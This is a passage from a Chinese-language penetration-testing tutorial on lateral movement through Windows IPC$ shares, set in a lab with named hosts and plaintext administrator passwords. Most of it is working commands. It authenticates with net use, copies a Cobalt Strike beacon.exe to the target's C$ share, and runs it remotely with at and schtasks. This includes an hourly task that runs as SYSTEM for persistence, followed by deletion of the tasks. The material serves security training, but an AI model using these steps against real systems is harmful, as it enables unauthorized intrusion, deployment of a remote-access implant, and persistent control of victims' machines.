4.5 复制文件
在这里可以使用命令行进行复制,也可以将目录挂载之后直接在界面上复制操作,也是可以的。
copy fscan.exe \\192.168.135.15\c$ #将指定文件拷贝到目标系统中
4.6 执行定时任务
执行定时任务分成两种:
- • at命令:只适用于win xp、2003等低版本:at 命令是Windows自带的用于创建计划任务的命令,但是 at 命令只在2003及以下的版本使用
- • schtasks 命令:Windows Vista、Windows Server 2008及之后版本
4.6.1 at命令
跳板机
Windows7
192.168.135.13
靶机
Windows server2003
192.168.135.5
用户名:administrator
密码:admin
首先在本机准备好一个cs,然后新建监听和生成木马:
生成的木马首先传到跳板机上去,然后准备使用IPC命令访问winserver2003:
使用IPC命令:
net use \\192.168.135.5 /u:"administrator" "admin"
此时可以看到靶机上C盘的信息,此时开始写马:
首先查看靶机的时间:
net time \\192.168.135.5
然后使用copy命令将cs的马儿拷贝到主机上去:
copy beacon.exe \\192.168.135.5\c$
使用at命令创建任务计划运行木马:
at \\192.168.135.5 13:20:00 cmd.exe /c "c:\beacon.exe"
此时上线成功:
在这里注意到有一个作业ID=2,这是创建任务计划的ID,同样可以通过指令将其删除:
at \\192.168.135.5 1 /delete
当有不存在的ID时,会进行提示:
4.6.2 schtasks命令
跳板机
Windows7
192.168.135.13
靶机
Windows server2008
192.168.135.15
用户名:administrator
密码:Admin@admin
4.6.2.1 schtasks常用命令
创建任务的命令行是schtasks /create,后方再加上其他参数,比较常用的参数如下:
参考:[https://chenchena.blog.csdn.net/article/details/124154100](https://chenchena.blog.csdn.net/article/details/124154100) /sc 计划任务类型,可选值为MINUTE、HOURLY、DAILY、WEEKLY、ONCE、ONSTART、ONLOGON、ONIDLE、MONTHLY、ONEVENT /tn 计划任务名称,后续查询、修改、删除、执行时使用 /tr 需要运行的程序或命令,传入的命令中间如果有空格会被截断为程序和参数,因此需要将双引号转义并传入。 /ru 运行任务的用户账户名,不使用此参数的话使用执行schtasks命令的账户运行计划任务 /rp 运行任务的用户账户密码 /mo 指定任务在计划类型中的运行间隔 /d 指定任务在一个月或者星期的某一天运行,只适用于MONTHLY和WEEKLY类型。 /m 指定任务在某个月运行,只适用于MONTHLY类型。 /i 当计划任务类型为ONIDLE时,运行任务前计算机处于空闲状态的分钟数。 /st 当计划任务类型为MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY时使用,指定任务的开始时间,默认为本地计算机的当前时间。 /ri 指定计划任务的重复间隔,以分钟为单位。不适合计划类型:MINUTE、HOURLY、ONSTART、ONLOGON、ONIDLE /et 指定计划任务的结束时间,适用于计划类型:MINUTE、HOURLY, 在指定的结束时间之后,schtasks 不会再次启动任务,除非当前系统时间调回开始时间。默认情况下,没有结束时间。 /du 指定任务计划的持续时间,与/et类似,默认情况下没有持续时间。 /k 在指定计划任务的结束时间或持续时间后停止任务,如果不加此参数,则在时间到了会继续运行或者重启该任务。 /it 只在用户登录时运行 /z 在任务计划完成后删除任务计划 /f 在创建任务时如果任务已存在不显示警告 /RL 为作业设置运行级别。有效值为LIMITED 和 HIGHEST。默认值为 LIMITED。 /F 如果指定的任务已经存在,则强制创建任务并抑制警告。 当使用了/sc参数为MINUTE、HOURLY、DAILY、WEEKLY时,我们需要指定/mo运行的间隔时间 MINUTE: 1 到 1439 分钟。 HOURLY: 1 - 23 小时。 DAILY: 1 到 365 天。 WEEKLY: 1 到 52 周。 ONCE: 无修改者。 ONSTART: 无修改者。 ONLOGON: 无修改者。 ONIDLE: 无修改者。 MONTHLY: 1 到 12,或 FIRST, SECOND, THIRD, FOURTH, LAST, LASTDAY。 ONEVENT: XPath 事件查询字符串。
4.6.2.2 执行schtasks命令
使用IPC命令连接winserver2008:
net use \\192.168.135.15 /u:"administrator" "Admin@admin"
此时可以看到靶机上C盘的信息,此时开始写马,首先查看靶机的时间:
net time \\192.168.135.15
然后使用copy命令将cs的马儿拷贝到主机上去:
copy beacon.exe \\192.168.135.15\c$
使用schtasks命令时,会在系统中留下日志文件:
C:\Windows\Tasks\SchedLgU.txt
在这里组合命令试试看:
schtasks /create /s 192.168.135.15
/u administrator /p Admin@admin /tn test_crow /tr c:/beacon.exe /sc once /st 14:32 #/s 目标 /u 用户名 /p 密码 /tn 计划任务名 /tr 指定文件路径 /sc 执行次数 或频率 /st 开始时间
此时上线成功:
4.6.2.3 查看任务计划
schtasks /query /s 192.168.135.15 /u administrator /p Admin@admin /tn test_crow # 查看任务计划
4.6.2.4 删除任务计划
schtasks /delete /s 192.168.135.15 /u administrator /p Admin@admin /tn test_crow #删除任务计划
4.6.2.5 定时启动任务计划
首先新建一个计划任务:
在目标主机上创建一个名为test_crow的计划任务,启动程序为c:/beacon.exe ,启动权限为system,启动时间为每隔一小时启动一次 schtasks /create /s 192.168.135.15 /u administrator /p Admin@admin /tn test_crow /sc HOURLY /mo 1 /tr c:/beacon.exe /ru system /f 其他启动时间参数: /sc onlogon 用户登录时启动 /sc onstart 系统启动时启动 /sc onidle 系统空闲时启动 此处参考:https://mp.weixin.qq.com/s/t5n4yK2LUTjD4nbMudqvsw
查看当前的任务计划:
在这里使用命令启动该计划任务:
schtasks /run /s 192.168.135.15 /u administrator /p Admin@admin /i /tn test_crow
激活之后,执行木马上线。删除任务计划:
schtasks /delete /s 192.168.135.15 /u administrator /p Admin@admin /tn test_crow
image.png
5. 总结
本文大量参考了谢公子的文章以及网络上其他的文章,基本上算是对IPC$共享的一个简单总结,感谢各位师傅的精彩文章,不胜感激!
参考资料:
https://baike.baidu.com/item/ipc/91622 https://wenku.baidu.com/view/05c3106da45177232f60a2e9.html https://wenku.baidu.com/view/b480746c25c52cc58ad6be06.html https://mp.weixin.qq.com/s/t5n4yK2LUTjD4nbMudqvsw
